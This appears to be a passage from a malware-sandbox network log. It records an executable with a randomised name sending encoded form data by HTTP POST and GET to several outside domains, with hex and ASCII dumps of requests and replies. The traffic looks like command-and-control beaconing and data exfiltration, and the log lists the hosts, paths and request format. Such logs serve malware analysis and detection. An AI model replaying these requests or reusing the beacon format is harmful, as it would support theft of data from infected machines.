                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 68 51 4f 71 48 76 34 53 2b 4e 6c 32 4a 2b 4f 41 51 55 78 68 79 35 6b 36 57 47 33 34 6f 52 44 67 44 45 32 55 55 31 30 38 6a 36 65 51 64 31 31 59 67 56 53 62 53 2f 51 71 2f 44 35 30 77 35 57 2b 56 31 54 43 66 36 38 39 58 74 59 4f 6e 6e 30 77 38 5a 7a 33 54 6c 69 31 54 63 33 71 67 56 55 49 4f 52 70 74 42 69 49 51 38 6b 54 62 2b 73 46 2b 39 5a 67 44 72 4b 72 6f 6e 37 44 4c 67 47 30 32 61 43 52 59 74 51 6f 59 64 70 4f 6c 36 75 74 39 7a 37 2b 68 78 4b 68 48 58 72 35 41 4e 73 32 71 42 4a 67 6b 6a 4d 6e 65 61 4c 47 5a 30 3d
                                                                                                                    Data Ascii: AHkx=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwhQOqHv4S+Nl2J+OAQUxhy5k6WG34oRDgDE2UU108j6eQd11YgVSbS/Qq/D50w5W+V1TCf689XtYOnn0w8Zz3Tli1Tc3qgVUIORptBiIQ8kTb+sF+9ZgDrKron7DLgG02aCRYtQoYdpOl6ut9z7+hxKhHXr5ANs2qBJgkjMneaLGZ0=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.4496543.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:31.946639061 CEST10848OUTPOST /u6k6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.healthyloveforall.net
                                                                                                                    Origin: http://www.healthyloveforall.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.healthyloveforall.net/u6k6/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 5a 51 50 62 6e 76 34 7a 2b 4e 6a 47 4a 2b 48 67 51 56 78 68 79 6b 6b 36 66 4f 33 34 6b 72 44 6c 48 45 32 78 59 31 79 4e 6a 36 58 51 64 31 74 6f 67 55 50 72 53 51 51 71 50 50 35 30 41 35 57 2b 56 31 54 41 48 36 76 4a 44 74 44 4f 6e 6b 7a 77 38 64 34 58 54 42 69 30 32 6e 33 71 6c 71 55 38 36 52 70 4a 6c 69 48 46 67 6b 63 62 2b 75 45 4f 38 61 67 44 57 4b 72 6f 54 4e 44 4b 46 68 30 31 47 43 52 35 41 54 72 38 42 45 62 7a 71 78 31 2f 54 73 6d 77 56 71 76 58 37 76 6f 77 46 72 6a 37 42 63 71 57 4f 46 37 4d 71 65 63 4a 77 55 4f 79 73 79 2b 50 6b 30 63 6c 62 32 5a 4d 57 4e 69 4e 48 46 33 4d 46 41 7a 67 46 39 46 71 68 4e 32 35 39 64 44 61 30 66 47 42 58 72 2b 78 77 41 73 59 31 62 61 48 67 2f 75 70 55 76 70 2b 36 2b 6b 36 70 49 63 6c 75 53 57 38 34 55 6d 44 4e 53 6a 70 39 65 4b 50 69 52 43 71 34 53 67 34 47 79 68 69 41 51 56 55 74 4c 65 49 6f 58 6a 49 36 69 67 4c 54 46 70 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwZQPbnv4z+NjGJ+HgQVxhykk6fO34krDlHE2xY1yNj6XQd1togUPrSQQqPP50A5W+V1TAH6vJDtDOnkzw8d4XTBi02n3qlqU86RpJliHFgkcb+uEO8agDWKroTNDKFh01GCR5ATr8BEbzqx1/TsmwVqvX7vowFrj7BcqWOF7MqecJwUOysy+Pk0clb2ZMWNiNHF3MFAzgF9FqhN259dDa0fGBXr+xwAsY1baHg/upUvp+6+k6pIcluSW84UmDNSjp9eKPiRCq4Sg4GyhiAQVUtLeIoXjI6igLTFpgoYs/eV6+l1t8wtCpAZTki/vphr3HvJgcdfNr/z7sm+lxypYmDpr8IaEQMi3g8Scv1zpoLObTANeK1olY5RFtN8knJB3anOl402aWQi+Nn6voUM61v78hhS46FFGFQiNOWjzJ8KE136ZsSWjkQCNBHRyB0kcmbgA7Gjznij4gQ1obSoXiIdbvqilmKtESZahr17r2JfYpypVIevdCF4EbUts2pXtJJW6k64/1PynxOulZP6cEul6FswJcwreodWXLYCdNbDhh+Bqk19/lCbpBAtO/M+aqzRKLqgVisNljX6S1o2T2Z6aJz416v4rjUw8sAEmyP9NPbLHoOBWJ4S3ZE0QAwdWvB51+gvUSyZITuxKkGiWPQmKm0J5kZblxt8jGzVqflFCC+RCiaslvr8Qc7IGqKIQgZH9bv9QhYl446LS4+tIOR0yGprAGCDj5LtaoAdWCgFxGqdI68jn3aalJyvM0B9+ArdQUMUjBYvJiIvXT2BbRSAI+1kxRtI44qEb6siAW+KqGxBHPFjwvymj7xKQPWhgSPzvNaRixnuTrH4UId/v/hik/KTHkrAfdjmCRpJi1PpfRtOPisK6fLQwT3CYH+mPp9dlw5vQwhXVAMWEZB8hfP51H1RZepxxV88z+So/FAfASfBd12RQ2fISLWYOXJCZlIKF7Y [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.4496553.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:34.485801935 CEST471OUTGET /u6k6/?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.healthyloveforall.net
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:34.967421055 CEST400INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 260
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 48 6b 78 3d 64 59 35 4c 66 42 78 54 38 2b 34 4f 54 59 67 55 45 4e 5a 68 4d 56 4b 4f 79 64 37 35 2f 70 4b 7a 4c 65 52 52 6e 39 7a 64 73 78 46 6c 64 37 6e 36 38 6d 79 48 32 47 64 32 57 32 46 53 30 33 48 50 74 2b 57 2f 39 4e 41 54 46 69 62 5a 79 69 59 34 35 75 72 79 57 55 35 74 79 2b 41 4a 4e 4c 58 4e 55 61 2b 4b 35 31 6b 38 65 64 56 79 51 54 43 4b 6a 4e 61 59 4a 35 59 3d 26 72 66 2d 4c 5a 3d 4a 6c 43 74 75 4e 33 48 71 50 4f 38 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.449656172.191.244.62803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:40.523505926 CEST725OUTPOST /jqkr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Origin: http://www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4b 51 6f 4b 64 2f 79 78 73 62 6c 5a 79 55 61 30 56 55 49 49 79 4d 6a 53 42 72 75 77 55 76 68 67 61 4a 57 39 61 62 69 42 7a 75 39 45 33 45 56 57 35 6f 42 6e 73 30 52 2f 43 71 6d 77 64 49 5a 58 2f 35 4f 36 4a 42 7a 48 35 2f 73 45 39 30 77 4a 73 47 65 46 6f 38 57 34 4b 63 6c 66 79 75 46 32 2b 46 47 70 5a 59 37 6d 66 59 42 6e 64 74 34 2b 52 49 48 78 6b 50 78 50 48 75 48 32 68 5a 35 53 59 6b 53 37 45 63 53 4b 47 4c 68 43 76 75 72 34 53 77 4a 33 69 39 76 36 72 30 43 57 76 66 42 4b 6f 77 76 59 41 41 2f 62 68 4e 54 32 4d 6b 6a 69 6f 44 73 48 6c 41 3d 3d
                                                                                                                    Data Ascii: AHkx=u/VSG/tzp2C4KQoKd/yxsblZyUa0VUIIyMjSBruwUvhgaJW9abiBzu9E3EVW5oBns0R/CqmwdIZX/5O6JBzH5/sE90wJsGeFo8W4KclfyuF2+FGpZY7mfYBndt4+RIHxkPxPHuH2hZ5SYkS7EcSKGLhCvur4SwJ3i9v6r0CWvfBKowvYAA/bhNT2MkjioDsHlA==
                                                                                                                    Oct 9, 2024 14:21:40.994254112 CEST195INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:40 GMT
                                                                                                                    Content-Length: 19
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.449657172.191.244.62803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:43.244692087 CEST745OUTPOST /jqkr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Origin: http://www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 31 67 61 6f 6d 39 62 61 69 42 77 75 39 45 2f 6b 56 54 30 49 42 73 73 30 4e 33 43 6f 79 77 64 49 39 58 2f 38 71 36 4b 79 62 47 2f 76 73 47 32 55 77 4c 68 6d 65 46 6f 38 57 34 4b 63 67 45 79 75 74 32 2b 30 57 70 5a 39 58 6e 56 34 42 6d 55 4e 34 2b 56 49 48 31 6b 50 78 78 48 71 66 4d 68 66 31 53 59 68 75 37 45 49 47 4e 50 4c 68 49 72 75 71 50 63 54 74 7a 6b 75 71 72 68 6c 32 69 6b 2b 64 61 70 32 2b 43 52 78 65 4d 7a 4e 33 46 52 6a 71 57 6c 41 52 4f 2b 4e 4e 36 4d 73 65 61 4e 42 78 68 67 41 45 6a 58 68 33 49 32 6d 34 3d
                                                                                                                    Data Ascii: AHkx=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUd1gaom9baiBwu9E/kVT0IBss0N3CoywdI9X/8q6KybG/vsG2UwLhmeFo8W4KcgEyut2+0WpZ9XnV4BmUN4+VIH1kPxxHqfMhf1SYhu7EIGNPLhIruqPcTtzkuqrhl2ik+dap2+CRxeMzN3FRjqWlARO+NN6MseaNBxhgAEjXh3I2m4=
                                                                                                                    Oct 9, 2024 14:21:43.768826962 CEST195INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:43 GMT
                                                                                                                    Content-Length: 19
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.449658172.191.244.62803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:45.783410072 CEST10827OUTPOST /jqkr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Origin: http://www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 74 67 61 2b 36 39 61 39 57 42 78 75 39 45 31 45 56 53 30 49 42 4c 73 30 46 7a 43 6f 76 53 64 4b 56 58 2b 65 69 36 64 7a 62 47 78 76 73 47 72 45 77 4b 73 47 66 66 6f 38 47 30 4b 63 51 45 79 75 74 32 2b 33 65 70 65 6f 37 6e 54 34 42 6e 64 74 35 73 52 49 48 64 6b 50 35 68 48 71 54 63 67 76 56 53 5a 42 65 37 43 39 53 4e 45 4c 68 4f 6e 4f 71 58 63 54 51 74 6b 74 4f 6e 68 6c 44 33 6b 2b 35 61 71 77 58 62 44 78 4f 46 77 2b 2f 6c 44 6b 7a 77 6a 78 68 39 36 36 5a 34 41 76 4c 41 62 7a 4e 6f 69 43 4e 79 42 69 62 71 69 51 66 77 30 57 4a 6c 78 77 56 67 62 79 69 34 43 45 7a 72 4d 38 32 6c 74 54 44 6e 69 58 7a 48 31 57 61 33 6f 67 44 61 51 73 50 31 34 4a 41 74 57 50 33 57 62 77 75 63 51 68 70 7a 7a 34 71 79 57 4d 34 6f 42 56 50 6e 57 4b 35 33 4c 67 6d 4d 70 77 2f 31 2f 44 7a 67 64 46 43 2f 65 63 53 52 37 70 69 52 5a 59 48 67 6d 2b 66 31 57 4a 48 71 54 39 58 2b 77 4e 78 39 73 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUdtga+69a9WBxu9E1EVS0IBLs0FzCovSdKVX+ei6dzbGxvsGrEwKsGffo8G0KcQEyut2+3epeo7nT4Bndt5sRIHdkP5hHqTcgvVSZBe7C9SNELhOnOqXcTQtktOnhlD3k+5aqwXbDxOFw+/lDkzwjxh966Z4AvLAbzNoiCNyBibqiQfw0WJlxwVgbyi4CEzrM82ltTDniXzH1Wa3ogDaQsP14JAtWP3WbwucQhpzz4qyWM4oBVPnWK53LgmMpw/1/DzgdFC/ecSR7piRZYHgm+f1WJHqT9X+wNx9s1xvk63j49ozHKH6MltsNzu+AC9nSvjmtcVhnrcGC1C3ktuyB72FCfZnfRvSyPhvR/pJtfhpiGrLdec6QWqtud/qI/QwIPy+AjzpuyTWbgfqiaUeJnjuLvsKUWkunDJT3u6W0UryUQLaYhQIFo3oc0c23/SeTe3Nkg9oE+3Py4et+iWeu3jFsYkRS7fQSKOkzjLREfEYqvKKc1PnKNx6+DIzwd3YJZlkc38gZ5DUxhybLTgZb49LEddlfrGf1LmO/LZCls1ZuDKTcuoRj3p2puHWjPbAeIfCjG0vpya8uOsgCnzq6nzUAHPDUQGvbcynIrwNEhCC3tnHnayCBCJCTeCkbC571OHnhjQApt6qXymPfOV/7ggPgQ3YUDDnicU7EaMN4V4L3O/58MsJTPen5DNIwtKcepklt03AWJlM/qWXQK501Z48FiUI4bT3aIte8hxDodumDjH81MNFFOH1UVan2DM9VjE5BsMEoQepeyP2RKV7POtwL8e9fQCuK0W9LZFPif7Hq6xJkxz1NXFPAYPCzEXoFvL7sLg7G9Cmcjmtu63K2bZku4v4lPI0Me/ui79pBTOzSNJ5jSjjHGopASVDFK5olk3QJE9/jkJ5AxFT/G0fDgrSFWO/zebNBucISifKZaAHXjScYO3/bNBuQvO1ZOZc5jkXoSm [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.449659172.191.244.62803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:48.327440977 CEST464OUTGET /jqkr/?AHkx=j99yFPFWu1ukFCAnSMaPoqYJsGaKTyAIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu+KoA1mYPwgzWoJCMPt1Uicxvw1jTfpaTUc0=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:48.798146963 CEST195INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:48 GMT
                                                                                                                    Content-Length: 19
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.449660162.241.244.106803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:53.970863104 CEST725OUTPOST /hya5/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.mommymode.site
                                                                                                                    Origin: http://www.mommymode.site
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.mommymode.site/hya5/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 48 43 32 6a 65 59 30 52 44 5a 59 42 6f 2b 64 36 4b 53 30 72 43 58 77 45 30 75 6a 59 50 6b 72 4c 54 70 47 73 5a 4e 30 72 33 5a 31 4f 68 4a 75 6a 4a 35 62 44 2b 73 32 2f 43 65 64 68 55 48 6b 6f 59 58 56 32 71 44 33 64 62 6e 69 42 5a 6c 36 65 53 49 59 61 51 65 62 77 70 66 36 61 78 74 64 6b 5a 7a 2b 31 68 75 34 74 71 73 55 65 77 52 62 4e 39 34 4d 31 45 39 2b 58 50 61 67 6a 5a 51 6c 55 71 77 32 53 76 38 78 39 53 47 6a 52 70 66 7a 38 39 35 45 51 35 35 57 38 41 2b 4c 71 72 66 4a 67 78 66 30 45 63 78 6e 39 4c 67 4d 73 72 78 43 58 2b 36 72 34 47 77 3d 3d
                                                                                                                    Data Ascii: AHkx=pDgGeDs8Yl7nHC2jeY0RDZYBo+d6KS0rCXwE0ujYPkrLTpGsZN0r3Z1OhJujJ5bD+s2/CedhUHkoYXV2qD3dbniBZl6eSIYaQebwpf6axtdkZz+1hu4tqsUewRbN94M1E9+XPagjZQlUqw2Sv8x9SGjRpfz895EQ55W8A+LqrfJgxf0Ecxn9LgMsrxCX+6r4Gw==
                                                                                                                    Oct 9, 2024 14:21:54.748464108 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:54 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                    X-nginx-cache: WordPress
                                                                                                                    Content-Length: 12947
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                    Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                    Oct 9, 2024 14:21:54.748496056 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                    Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                    Oct 9, 2024 14:21:54.748513937 CEST448INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                    Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                    Oct 9, 2024 14:21:54.748573065 CEST1236INData Raw: 81 5d 54 d1 bd da d5 5b ec c6 03 04 d9 0c 73 77 67 3d 31 b3 78 59 55 95 f1 38 4d 71 74 75 d2 1f e2 70 f7 3d e7 a1 4d ca cf f2 b5 aa 8d b8 10 7e 90 6b 0d d2 7e e7 e2 71 ba 76 ac f0 d6 2f 6c 9e 2a 1c b5 ce db 2e 2a ad e5 14 d7 04 ed f7 b2 4b 62 94
                                                                                                                    Data Ascii: ]T[swg=1xYU8Mqtup=M~k~qv/l*.*Kb!y1;5jv@/Cn2~$,x+jPD8MeYW)%\f]6bK8Wr.P}Q@ir%\b4S2io%8UR,TM&{r'Q
